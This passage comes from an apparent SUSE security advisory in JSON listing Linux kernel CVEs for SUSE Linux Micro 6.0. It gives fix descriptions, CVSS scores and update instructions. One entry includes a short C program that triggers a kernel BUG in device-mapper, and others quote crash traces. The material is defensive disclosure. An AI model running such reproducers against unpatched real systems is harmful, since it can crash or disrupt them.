"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53858",
"url": "https://www.suse.com/security/cve/CVE-2023-53858"
},
{
"category": "external",
"summary": "SUSE Bug 1254704 for CVE-2023-53858",
"url": "https://bugzilla.suse.com/1254704"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53858"
},
{
"cve": "CVE-2023-53860",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53860"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndm: don\u0027t attempt to queue IO under RCU protection\n\ndm looks up the table for IO based on the request type, with an\nassumption that if the request is marked REQ_NOWAIT, it\u0027s fine to\nattempt to submit that IO while under RCU read lock protection. This\nis not OK, as REQ_NOWAIT just means that we should not be sleeping\nwaiting on other IO, it does not mean that we can\u0027t potentially\nschedule.\n\nA simple test case demonstrates this quite nicely:\n\nint main(int argc, char *argv[])\n{\n struct iovec iov;\n int fd;\n\n fd = open(\"/dev/dm-0\", O_RDONLY | O_DIRECT);\n posix_memalign(\u0026iov.iov_base, 4096, 4096);\n iov.iov_len = 4096;\n preadv2(fd, \u0026iov, 1, 0, RWF_NOWAIT);\n return 0;\n}\n\nwhich will instantly spew:\n\nBUG: sleeping function called from invalid context at include/linux/sched/mm.h:306\nin_atomic(): 0, irqs_disabled(): 0, non_block: 0, pid: 5580, name: dm-nowait\npreempt_count: 0, expected: 0\nRCU nest depth: 1, expected: 0\nINFO: lockdep is turned off.\nCPU: 7 PID: 5580 Comm: dm-nowait Not tainted 6.6.0-rc1-g39956d2dcd81 #132\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x11d/0x1b0\n __might_resched+0x3c3/0x5e0\n ? preempt_count_sub+0x150/0x150\n mempool_alloc+0x1e2/0x390\n ? mempool_resize+0x7d0/0x7d0\n ? lock_sync+0x190/0x190\n ? lock_release+0x4b7/0x670\n ? internal_get_user_pages_fast+0x868/0x2d40\n bio_alloc_bioset+0x417/0x8c0\n ? bvec_alloc+0x200/0x200\n ? internal_get_user_pages_fast+0xb8c/0x2d40\n bio_alloc_clone+0x53/0x100\n dm_submit_bio+0x27f/0x1a20\n ? lock_release+0x4b7/0x670\n ? blk_try_enter_queue+0x1a0/0x4d0\n ? dm_dax_direct_access+0x260/0x260\n ? rcu_is_watching+0x12/0xb0\n ? blk_try_enter_queue+0x1cc/0x4d0\n __submit_bio+0x239/0x310\n ? __bio_queue_enter+0x700/0x700\n ? kvm_clock_get_cycles+0x40/0x60\n ? ktime_get+0x285/0x470\n submit_bio_noacct_nocheck+0x4d9/0xb80\n ? should_fail_request+0x80/0x80\n ? preempt_count_sub+0x150/0x150\n ? lock_release+0x4b7/0x670\n ? __bio_add_page+0x143/0x2d0\n ? iov_iter_revert+0x27/0x360\n submit_bio_noacct+0x53e/0x1b30\n submit_bio_wait+0x10a/0x230\n ? submit_bio_wait_endio+0x40/0x40\n __blkdev_direct_IO_simple+0x4f8/0x780\n ? blkdev_bio_end_io+0x4c0/0x4c0\n ? stack_trace_save+0x90/0xc0\n ? __bio_clone+0x3c0/0x3c0\n ? lock_release+0x4b7/0x670\n ? lock_sync+0x190/0x190\n ? atime_needs_update+0x3bf/0x7e0\n ? timestamp_truncate+0x21b/0x2d0\n ? inode_owner_or_capable+0x240/0x240\n blkdev_direct_IO.part.0+0x84a/0x1810\n ? rcu_is_watching+0x12/0xb0\n ? lock_release+0x4b7/0x670\n ? blkdev_read_iter+0x40d/0x530\n ? reacquire_held_locks+0x4e0/0x4e0\n ? __blkdev_direct_IO_simple+0x780/0x780\n ? rcu_is_watching+0x12/0xb0\n ? __mark_inode_dirty+0x297/0xd50\n ? preempt_count_add+0x72/0x140\n blkdev_read_iter+0x2a4/0x530\n do_iter_readv_writev+0x2f2/0x3c0\n ? generic_copy_file_range+0x1d0/0x1d0\n ? fsnotify_perm.part.0+0x25d/0x630\n ? security_file_permission+0xd8/0x100\n do_iter_read+0x31b/0x880\n ? import_iovec+0x10b/0x140\n vfs_readv+0x12d/0x1a0\n ? vfs_iter_read+0xb0/0xb0\n ? rcu_is_watching+0x12/0xb0\n ? rcu_is_watching+0x12/0xb0\n ? lock_release+0x4b7/0x670\n do_preadv+0x1b3/0x260\n ? do_readv+0x370/0x370\n __x64_sys_preadv2+0xef/0x150\n do_syscall_64+0x39/0xb0\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\nRIP: 0033:0x7f5af41ad806\nCode: 41 54 41 89 fc 55 44 89 c5 53 48 89 cb 48 83 ec 18 80 3d e4 dd 0d 00 00 74 7a 45 89 c1 49 89 ca 45 31 c0 b8 47 01 00 00 0f 05 \u003c48\u003e 3d 00 f0 ff ff 0f 87 be 00 00 00 48 85 c0 79 4a 48 8b 0d da 55\nRSP: 002b:00007ffd3145c7f0 EFLAGS: 00000246 ORIG_RAX: 0000000000000147\nRAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f5af41ad806\nRDX: 0000000000000001 RSI: 00007ffd3145c850 RDI: 0000000000000003\nRBP: 0000000000000008 R08: 0000000000000000 R09: 0000000000000008\nR10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000003\nR13: 00007ffd3145c850 R14: 000055f5f0431dd8 R15: 0000000000000001\n \u003c/TASK\u003e\n\nwhere in fact it is\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53860",
"url": "https://www.suse.com/security/cve/CVE-2023-53860"
},
{
"category": "external",
"summary": "SUSE Bug 1254626 for CVE-2023-53860",
"url": "https://bugzilla.suse.com/1254626"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53860"
},
{
"cve": "CVE-2023-53861",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53861"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: correct grp validation in ext4_mb_good_group\n\nGroup corruption check will access memory of grp and will trigger kernel\ncrash if grp is NULL. So do NULL check before corruption check.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53861",
"url": "https://www.suse.com/security/cve/CVE-2023-53861"
},
{
"category": "external",
"summary": "SUSE Bug 1254678 for CVE-2023-53861",
"url": "https://bugzilla.suse.com/1254678"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53861"
},
{
"cve": "CVE-2023-53863",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53863"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetlink: do not hard code device address lenth in fdb dumps\n\nsyzbot reports that some netdev devices do not have a six bytes\naddress [1]\n\nReplace ETH_ALEN by dev-\u003eaddr_len.\n\n[1] (Case of a device where dev-\u003eaddr_len = 4)\n\nBUG: KMSAN: kernel-infoleak in instrument_copy_to_user include/linux/instrumented.h:114 [inline]\nBUG: KMSAN: kernel-infoleak in copyout+0xb8/0x100 lib/iov_iter.c:169\ninstrument_copy_to_user include/linux/instrumented.h:114 [inline]\ncopyout+0xb8/0x100 lib/iov_iter.c:169\n_copy_to_iter+0x6d8/0x1d00 lib/iov_iter.c:536\ncopy_to_iter include/linux/uio.h:206 [inline]\nsimple_copy_to_iter+0x68/0xa0 net/core/datagram.c:513\n__skb_datagram_iter+0x123/0xdc0 net/core/datagram.c:419\nskb_copy_datagram_iter+0x5c/0x200 net/core/datagram.c:527\nskb_copy_datagram_msg include/linux/skbuff.h:3960 [inline]\nnetlink_recvmsg+0x4ae/0x15a0 net/netlink/af_netlink.c:1970\nsock_recvmsg_nosec net/socket.c:1019 [inline]\nsock_recvmsg net/socket.c:1040 [inline]\n____sys_recvmsg+0x283/0x7f0 net/socket.c:2722\n___sys_recvmsg+0x223/0x840 net/socket.c:2764\ndo_recvmmsg+0x4f9/0xfd0 net/socket.c:2858\n__sys_recvmmsg net/socket.c:2937 [inline]\n__do_sys_recvmmsg net/socket.c:2960 [inline]\n__se_sys_recvmmsg net/socket.c:2953 [inline]\n__x64_sys_recvmmsg+0x397/0x490 net/socket.c:2953\ndo_syscall_x64 arch/x86/entry/common.c:50 [inline]\ndo_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80\nentry_SYSCALL_64_after_hwframe+0x63/0xcd\n\nUninit was stored to memory at:\n__nla_put lib/nlattr.c:1009 [inline]\nnla_put+0x1c6/0x230 lib/nlattr.c:1067\nnlmsg_populate_fdb_fill+0x2b8/0x600 net/core/rtnetlink.c:4071\nnlmsg_populate_fdb net/core/rtnetlink.c:4418 [inline]\nndo_dflt_fdb_dump+0x616/0x840 net/core/rtnetlink.c:4456\nrtnl_fdb_dump+0x14ff/0x1fc0 net/core/rtnetlink.c:4629\nnetlink_dump+0x9d1/0x1310 net/netlink/af_netlink.c:2268\nnetlink_recvmsg+0xc5c/0x15a0 net/netlink/af_netlink.c:1995\nsock_recvmsg_nosec+0x7a/0x120 net/socket.c:1019\n____sys_recvmsg+0x664/0x7f0 net/socket.c:2720\n___sys_recvmsg+0x223/0x840 net/socket.c:2764\ndo_recvmmsg+0x4f9/0xfd0 net/socket.c:2858\n__sys_recvmmsg net/socket.c:2937 [inline]\n__do_sys_recvmmsg net/socket.c:2960 [inline]\n__se_sys_recvmmsg net/socket.c:2953 [inline]\n__x64_sys_recvmmsg+0x397/0x490 net/socket.c:2953\ndo_syscall_x64 arch/x86/entry/common.c:50 [inline]\ndo_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80\nentry_SYSCALL_64_after_hwframe+0x63/0xcd\n\nUninit was created at:\nslab_post_alloc_hook+0x12d/0xb60 mm/slab.h:716\nslab_alloc_node mm/slub.c:3451 [inline]\n__kmem_cache_alloc_node+0x4ff/0x8b0 mm/slub.c:3490\nkmalloc_trace+0x51/0x200 mm/slab_common.c:1057\nkmalloc include/linux/slab.h:559 [inline]\n__hw_addr_create net/core/dev_addr_lists.c:60 [inline]\n__hw_addr_add_ex+0x2e5/0x9e0 net/core/dev_addr_lists.c:118\n__dev_mc_add net/core/dev_addr_lists.c:867 [inline]\ndev_mc_add+0x9a/0x130 net/core/dev_addr_lists.c:885\nigmp6_group_added+0x267/0xbc0 net/ipv6/mcast.c:680\nipv6_mc_up+0x296/0x3b0 net/ipv6/mcast.c:2754\nipv6_mc_remap+0x1e/0x30 net/ipv6/mcast.c:2708\naddrconf_type_change net/ipv6/addrconf.c:3731 [inline]\naddrconf_notify+0x4d3/0x1d90 net/ipv6/addrconf.c:3699\nnotifier_call_chain kernel/notifier.c:93 [inline]\nraw_notifier_call_chain+0xe4/0x430 kernel/notifier.c:461\ncall_netdevice_notifiers_info net/core/dev.c:1935 [inline]\ncall_netdevice_notifiers_extack net/core/dev.c:1973 [inline]\ncall_netdevice_notifiers+0x1ee/0x2d0 net/core/dev.c:1987\nbond_enslave+0xccd/0x53f0 drivers/net/bonding/bond_main.c:1906\ndo_set_master net/core/rtnetlink.c:2626 [inline]\nrtnl_newlink_create net/core/rtnetlink.c:3460 [inline]\n__rtnl_newlink net/core/rtnetlink.c:3660 [inline]\nrtnl_newlink+0x378c/0x40e0 net/core/rtnetlink.c:3673\nrtnetlink_rcv_msg+0x16a6/0x1840 net/core/rtnetlink.c:6395\nnetlink_rcv_skb+0x371/0x650 net/netlink/af_netlink.c:2546\nrtnetlink_rcv+0x34/0x40 net/core/rtnetlink.c:6413\nnetlink_unicast_kernel net/netlink/af_netlink.c:1339 [inline]\nnetlink_unicast+0xf28/0x1230 net/netlink/af_\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53863",
"url": "https://www.suse.com/security/cve/CVE-2023-53863"
},
{
"category": "external",
"summary": "SUSE Bug 1254657 for CVE-2023-53863",
"url": "https://bugzilla.suse.com/1254657"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53863"
},
{
"cve": "CVE-2023-53864",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53864"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/mxsfb: Disable overlay plane in mxsfb_plane_overlay_atomic_disable()\n\nWhen disabling overlay plane in mxsfb_plane_overlay_atomic_update(),\noverlay plane\u0027s framebuffer pointer is NULL. So, dereferencing it would\ncause a kernel Oops(NULL pointer dereferencing). Fix the issue by\ndisabling overlay plane in mxsfb_plane_overlay_atomic_disable() instead.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53864",
"url": "https://www.suse.com/security/cve/CVE-2023-53864"
},
{
"category": "external",
"summary": "SUSE Bug 1254754 for CVE-2023-53864",
"url": "https://bugzilla.suse.com/1254754"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53864"
},
{
"cve": "CVE-2023-53865",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53865"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix warning when putting transaction with qgroups enabled after abort\n\nIf we have a transaction abort with qgroups enabled we get a warning\ntriggered when doing the final put on the transaction, like this:\n\n [552.6789] ------------[ cut here ]------------\n [552.6815] WARNING: CPU: 4 PID: 81745 at fs/btrfs/transaction.c:144 btrfs_put_transaction+0x123/0x130 [btrfs]\n [552.6817] Modules linked in: btrfs blake2b_generic xor (...)\n [552.6819] CPU: 4 PID: 81745 Comm: btrfs-transacti Tainted: G W 6.4.0-rc6-btrfs-next-134+ #1\n [552.6819] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.2-0-gea1b7a073390-prebuilt.qemu.org 04/01/2014\n [552.6819] RIP: 0010:btrfs_put_transaction+0x123/0x130 [btrfs]\n [552.6821] Code: bd a0 01 00 (...)\n [552.6821] RSP: 0018:ffffa168c0527e28 EFLAGS: 00010286\n [552.6821] RAX: ffff936042caed00 RBX: ffff93604a3eb448 RCX: 0000000000000000\n [552.6821] 